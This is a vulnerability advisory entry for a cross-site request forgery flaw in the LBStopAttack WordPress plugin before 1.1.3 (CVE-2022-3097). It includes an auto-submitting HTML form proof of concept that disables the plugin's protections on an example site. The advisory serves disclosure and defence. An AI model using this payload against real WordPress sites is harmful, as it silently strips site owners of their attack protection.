Lucene search
Daniel RufWPEX-ID:9EBB8318-EBAF-4DE7-B337-C91327685A43HistorySep 29, 2022 - 12:00 a.m.
LBStopAttack < 1.1.3 - Arbitrary Settings Update via CSRF
2022-09-2900:00:00
Daniel Ruf
251
arbitrary settings update
csrf
form submission.
0.001 Low
EPSS
Percentile
34.1%
The plugin does not use nonces when saving its settings, making it possible for attackers to conduct CSRF attacks. This could allow attackers to disable the plugin’s protections.
<form id="test" action="https://example.com/wp-admin/admin.php?page=lbsa_home" method="post">
<input type="text" name="savelbsa" value="1">
<input type="text" name="onlyfront" value="0">
<input type="text" name="checkwp" value="0">
<input type="text" name="namespaces" value="GET">
<input type="text" name="levelLFI" value="50">
<input type="text" name="sendnotification" value="0">
<input type="text" name="sendto" value="">
<input type="text" name="raiseerror" value="0">
<input type="text" name="redirurl" value="https://google.com">
<input type="text" name="errorcode" value="">
<input type="text" name="errormsg" value="">
<input type="text" name="ipblock" value="0">
<input type="text" name="ipblocktime" value="222">
<input type="text" name="ipblockcount" value="666666666">
</form>
<script>
document.getElementById("test").submit();
</script>Related
prion
prion
Cross site request forgery (csrf)
2022-10-25 17:15:00
nvd
nvd
CVE-2022-3097
2022-10-25 17:15:56
wpvulndb
wpvulndb
LBStopAttack < 1.1.3 - Arbitrary Settings Update via CSRF
2022-09-29 00:00:00
cve
cve
CVE-2022-3097
2022-10-25 17:15:56
cvelist
cvelist
CVE-2022-3097 LBStopAttack < 1.1.3 - Arbitrary Settings Update via CSRF
2022-10-25 00:00:00
patchstack
patchstack